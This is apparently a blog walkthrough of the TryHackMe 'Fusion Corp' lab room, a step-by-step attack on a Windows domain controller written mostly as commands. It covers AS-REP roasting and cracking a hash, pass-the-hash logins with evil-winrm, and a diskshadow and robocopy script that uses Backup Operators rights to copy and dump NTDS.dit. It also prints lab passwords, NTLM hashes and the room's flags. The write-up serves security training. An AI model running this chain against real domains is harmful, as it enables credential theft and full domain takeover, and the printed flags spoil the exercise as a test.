Fusion Corp TryHackMe Walkthrough

Rich
4 min readDec 3, 2023

--

TL;DR Walkthrough of the TryHackMe Fusion Corp room.

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Background

I had just gotten around to finally consolidating our notes on using Windows VMs from Kali here when I noticed the Fusion Corp room. It’s a good ‘by the numbers’ enumeration, initial access, pivot, and escalate exercise. I refined and updated my notes along the way.

I’ll start with the hints as that may be all others need if they’re stuck:

  • Enumerate the website, there’s a username list hidden in it
  • ASREPRoast the usernames
  • Enumerate AD once you gain initial access
  • Once you find the account to pivot to, check its privileges
  • Remember that Backup Operators can backup, copy, and dump NTDS.dit

Like many other THM VMs, this one kept becoming non-functional after 1 hour and I’d have to restart it. Hence the target IP changes during the walkthrough.

Scanning & enumeration

As always start with nmap.

sudo nmap -sV -O 10.10.217.197

One will notice right away that the target is a DC for the corp.local domain and that it’s running a webserver.

Let’s see if there’s any useful info on the website.

#Enumerate for hidden directories using dirb
dirb http://10.10.217.197 /usr/share/wordlists/dirb/common.txt

We get a directory named backup with an employee name & username list. Nice, we don’t have to run Mishka’s Mangler. We can just feed the names into Kerbrute and/or ASREPRoast.

#Pull the usernames from the list
Set-Location ".\THM stuff\THM Writeups\Fusion Corp"
$RawThings = Get-Content .\Raw.txt
ForEach($RawThing in $RawThings)
{
$Username = $RawThing.Split('')[2]
$Username | Out-File .\usernames.txt -Append
}

Copy/paste the contents of usernames.txt over to Kali & save them in a text file.

gedit /home/kali/Downloads/Wordlists/FusionCorpUsernames.txt

Gaining initial access

Add the target to the hosts file so Kali knows what IP to use for the domain name.

sudo gedit /etc/hosts
10.10.217.197 fusion.corp

ASREPRoast and see if we get lucky.

/home/kali/Downloads/impacket-master/build/scripts-3.9/GetNPUsers.py fusion.corp/ -no-pass -usersfile /home/kali/Downloads/Wordlists/FusionCorpUsernames.txt

I attempted cracking with hashcat, but with no joy.

hashcat -m 18200 ‘$krb5asrep$23$lparker@FUSION.CORP:75cf284e2ec240d109cd0adef095cd96$2bfbf7f9ae13ae6f3ab82c31baa28dd3213bf6a062f8d39e71a5fd7812e806a9a8c2610a5502517156b35c56f34ebb12bf5c809232607871ab4a52571d0d06581133bc59817d1a2590f76e534ace00f997f117c61b559c711748fec04235127898c678b38d7f3aa33b9deffea94c02f577be3b02bb4bf3b9ca400e556ffe79c684ec4923d521eee224ba32f24e48a32d581e6e5dbd6588502441c89d1a95e533e3c5fa4909e1e0a9e34194985f717abe9812605365307fbdbccd3dce5bd5d68b16676e5439a8af14889923b9417a1c459884e9d454ce4693923a84bde09ecdb3eab78b9ec83d116e8fd2’ -a 3 rockyou.txt

However john cracked it no problem.

john --wordlist=/home/kali/Downloads/Wordlists/rockyou.txt /home/kali/Downloads/hashes/Fusion

We get lparker \ !!abbylvzsvs2k6!

I checked for shares with crackmapexec. Remember that you have to escape special characters like ! in BASH by using a \ before them.

crackmapexec smb 10.10.21.236 -u lparker -p \!\!abbylvzsvs2k6\! --shares
smbclient \\\\10.10.21.236\\NETLOGON -U fusion.corp\\lparker --password \!\!abbylvzsvs2k6\!

There wasn’t anything interesting or useful on NETLOGON or SYSVOL however. One always wants to check these though as careless sysadmins and CTFs will both often leave plaintext credentials in logon scripts.

I realized a nifty trick around this time that I will probably use again; copy\paste the plaintext password into https://codebeautify.org/ntlm-hash-generator and get the NTLM. You can then PTH and login without having to escape characters.

evil-winrm -i 10.10.21.236 -u lparker -H 5A2ED7B4BB2CD206CC884319B97B6CE8

Get-ADUser -Filter * -Properties * | Select-Object SamAccountName, Description

Pivot

Let’s login as jmurphy after converting that password to NTLM.

evil-winrm -i 10.10.208.148 -u jmurphy -H 69C62E471CF61441BB80C5AF410A17A3

whoami /priv
whoami /groups

Backup Operators can backup the hard drive and then copy files from the backup. This means Backup Operators can access NTDS.dit, download it to Kali, and dump it offline. We ran a lab project on doing this with secretsdump and DSInternals here.

Create a backup.txt on Kali containing:

set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX

Then via evil-winrm logged in as jmurphy:

New-Item -Type Directory C:\Temp
Set-Location C:\Temp
upload /home/kali/Downloads/exploits/backup.txt
diskshadow /s backup.txt

#Once that's done
robocopy /b E:\Windows\ntds . ntds.dit
reg save hklm\system c:\temp\system
download ntds.dit /home/kali/Downloads/Pilfered/Fusion/ntds.dit
download C:\Temp\system /home/kali/Downloads/Pilfered/Fusion/system
#Dump NTDS.dit offline on Kali
cd /home/kali/Downloads/Pilfered/Fusion
python3 /home/kali/Downloads/impacket-master/examples/secretsdump.py -ntds ntds.dit -system system LOCAL

Escalate privileges

We can now login as the Administrator and quickly find all the flags.

evil-winrm -i 10.10.208.148 -u Administrator -H 9653b02d945329c7270525c4c2a69c67

Get-ChildItem -Path C:\Users -Recurse -ErrorAction SilentlyContinue | Select-String "THM{"

C:\Users\Administrator\Desktop\flag.txt:1:THM{f72988e57bfc1deeebf2115e10464d15}

C:\Users\jmurphy\Desktop\flag.txt:1:THM{b4aee2db2901514e28db4242e047612e}

C:\Users\lparker\Desktop\flag.txt:1:THM{c105b6fb249741b89432fada8218f4ef}

lparker is of course user 1, jmurphy is 2, and the Administrator is 3.

Summary

This room was good practice overall. I learned a new trick and updated my cheatsheet for enumerating, attacking, and connecting to Windows domains from Kali.

References

smbclient syntax: https://www.samba.org/samba/docs/current/man-html/smbclient.1.html

Backup Operators & dumping NTDS.dit offline: https://happycamper84.medium.com/securing-ad-backups-8804b31da9fd

Handy table of hashcat mode mapped to hash type: https://hashcat.net/wiki/doku.php?id=example_hashes

--

--

Rich
Rich

Written by Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from auditing or the lab.

No responses yet